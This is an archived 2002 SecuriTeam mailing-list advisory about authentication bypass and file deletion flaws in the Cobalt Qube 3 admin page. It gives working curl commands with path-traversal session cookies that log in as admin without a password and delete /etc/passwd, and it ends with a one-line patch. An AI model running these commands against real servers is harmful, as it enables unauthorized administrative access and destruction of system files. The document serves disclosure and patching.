[UNIX] Cobalt Qube 3 Administration Page Insecurity
From: support@securiteam.comDate: 07/25/02
- Previous message: support@securiteam.com: "[NT] VMWare GSX Server Remote Buffer Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Thu, 25 Jul 2002 12:05:17 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Cobalt Qube 3 Administration Page Insecurity
------------------------------------------------------------------------
SUMMARY
Several security vulnerabilities have been found in the Cobalt Qube 3
product, the vulnerabilities would allow an attacker to bypass the
authentication mechanism gaining administrative privileges and to delete
any file they want.
DETAILS
Vulnerable systems:
Cobalt Qube 3 release 6.0 (Kernel 2.2.16C7)
Problem 1: Local Privilege Escalation to Admin
Any user with ability to create file in any location of a Cobalt server
will be able to promote to Admin access of the System Management. A user
may create a file in /tmp/test and constructed a cookie to login as Admin
without password:
Create dummy session file in Cobalt server:
$ printf "admin" > /tmp/test
Login without password from anywhere:
$ curl -b sessionId=/../../../../../../tmp/test\;loginName=admin
http://192.168.0.1:444/splashAdmin.php
Problem 2: Remote User access
By using the account name of newly created user, we can bypass the
authentication without a need to create dummy session file in the server:
$curl -b sessionId=../codb/objects/4/.name\;loginName=admin
http://192.168.0.1:444/splashAdmin.php
Problem 3: Remotely delete files
It is possible to delete file from the server by specifying the path to
the file and the first 31 characters of the file. The following example
will delete the /etc/passwd file from the server:
$curl -b
sessionId=../../../../../../../../etc/passwd\;loginName=root:x:0:0:root:/root:/bin/bash http://192.168.0.1:444/splashAdmin.php
Quick Solution:
Modify file /usr/sausalito/ui/libPhp/ServerScriptHelper.php:
line 64:
$sessionId = ereg_replace("\.\.","",$sessionId);
ADDITIONAL INFORMATION
The information has been provided by
<mailto:pokleyzz@scan-associates.net> pokleyzz,
<mailto:sk@scan-associates.net> sk, and
<mailto:shaharil@scan-associates.net> shaharil.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NT] VMWare GSX Server Remote Buffer Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
